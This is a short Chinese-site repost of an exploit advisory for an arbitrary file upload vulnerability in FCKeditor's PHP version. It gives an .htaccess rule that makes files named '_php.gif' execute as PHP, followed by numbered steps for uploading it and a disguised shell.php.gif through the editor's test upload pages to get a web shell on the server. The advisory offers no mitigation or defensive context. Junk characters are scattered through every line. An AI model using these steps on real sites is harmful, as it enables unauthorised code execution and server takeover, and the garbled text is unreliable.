FCKeditor所有php版本Upload上传漏洞
( \% p. F# s$ z1 P9 n: X/ y) |作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07* D8 P5 g: B/ h/ D% P
减小字体 增大字体
' P4 h' Q9 s" G+ r) K9 y[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
2 }: H6 V6 o# c2 O6 u0 k[+] Date: 2011
, k7 ?" l" D4 A! @[+] Author : sinesafe.cn
9 Q$ H- o5 \5 I6 }! ?, g[+] Website : WwW.sinesafe.cn" h/ ?3 N2 q/ c3 ^ [/ U/ H) _
———————————————————
& K. J- d2 p3 M1 _1.create a htaccess file:
( d9 x5 k9 x( }9 O2 u7 `code:/ r0 o4 U( R9 D7 ` V
<FilesMatch “_php.gif”>! T; m, |6 G5 F K4 y
SetHandler application/x-httpd-php
/ W, f3 t9 n# q: i</FilesMatch>
2 j: ?; j% {/ \. u0 z
1 f% `5 q" [* Y( G) n+ T0 l# P: r2.Now upload this htaccess with FCKeditor.
# X) a/ P0 H8 Q4 r
9 m) D& c0 A) i! l8 b5 O# ]+ |http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
" K3 `, g* b4 [2 {4 `8 ^" ?% w7 W+ m" h+ [: `$ u
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
" ]5 T) ], z: y. m, Z4 M/ C) x/ _$ R* x! u9 q+ u
———————————————————————————————-( |% A! R; F1 `( a
3.Now upload shell.php.gif with FCKeditor.
/ l$ Q' Q* }7 x' m* y' z; X. s4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
& o G1 ?: j6 w7 N# Z6 c5.http://www.sinesafe.cn/anything/shell_php.gif
2 t5 U6 Y: I7 |( f% \ F; q6.Now shell is available from server. | 5 x4 m8 x+ l- d$ S$ L
$ y9 {( Z2 S" M F
@% h% \9 L# A$ P1 j5 c; U
|